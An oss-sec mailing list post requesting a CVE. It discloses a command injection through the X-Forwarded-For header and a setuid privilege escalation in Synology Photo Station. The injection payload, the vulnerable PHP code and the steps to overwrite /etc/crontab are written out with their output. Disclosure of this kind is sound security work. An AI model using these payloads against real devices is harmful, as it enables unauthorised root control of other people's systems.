oss-sec mailing list archives
CVE request: Synology Photo Station command injection and privilege escalation
From: "lucas_leong () trend com tw" <lucas_leong () trend com tw>
Date: Thu, 28 Jan 2016 06:31:46 +0000
Title: Synology Photo Station command injection and privilege escalation Vendor: Synology (https://www.synology.com/) Product: Photo Station Status: Patch released Affected: version <= 6.3-2954 Impact: Any guest account can execute arbitrary command with root permission Vulnerability 1: Command injection The vulnerability is in appstore/PhotoStation/photo/login.php 118 if ($x_forward) { 119 $ip = $x_forward; 120 } ... 176 $commend = "/usr/syno/bin/synoautoblock --reset \"".$ip."\""; 177 @system($commend, $retval); Since, the page did not filter X-Forwarded-For header and lead to command injection After sending a crafted header, a command is executed under http permission X-Forwarded-For: ";id>/tmp/hack;"
cat /tmp/hack
uid=1023(http) gid=1023(http) groups=1023(http) Vulnerability 2: Privilege escalation For the privilege escalation vulnerability, it is a simple setuid problem.
ls -al /usr/syno/bin/synophoto_dsm_user
lrwxrwxrwx 1 root root 56 Sep 16 22:53 /usr/syno/bin/synophoto_dsm_user -> /var/packages/PhotoStation/target/bin/synophoto_dsm_user
ls -al /var/packages/PhotoStation/target/bin/synophoto_dsm_user
-rwsr-xr-x 1 root root 30520 Jul 6 19:55 /var/packages/PhotoStation/target/bin/synophoto_dsm_user
ls -al /tmp/hack2
-rw-rw-rw- 1 http http 15 Sep 23 00:24 /tmp/hack2
cat /tmp/hack2
pwned by lucas
ls -al /etc/crontab
-rw-r--r-- 1 root root 404 Aug 27 13:25 /etc/crontab
synophoto_dsm_user --copy-no-ea /tmp/hack2 /etc/crontab cat /etc/crontab
pwned by lucas After overwritng crontab, arbitrary process can be executed with root permission Patch: Vendor released the patch and the issue has solved in 6.3-2958 https://www.synology.com/en-us/releaseNote/PhotoStation Timeline: 2015/09/23 Vendor Notified 2015/10/01 Patch Released <table class="TM_EMAIL_NOTICE"><tr><td><pre> TREND MICRO EMAIL NOTICE The information contained in this email and any attachments is confidential and may be subject to copyright or other intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this information, and we request that you notify us by reply mail or telephone and delete the original message from your mail system. </pre></td></tr></table>
Current thread:
- CVE request: Synology Photo Station command injection and privilege escalation lucas_leong () trend com tw (Jan 27)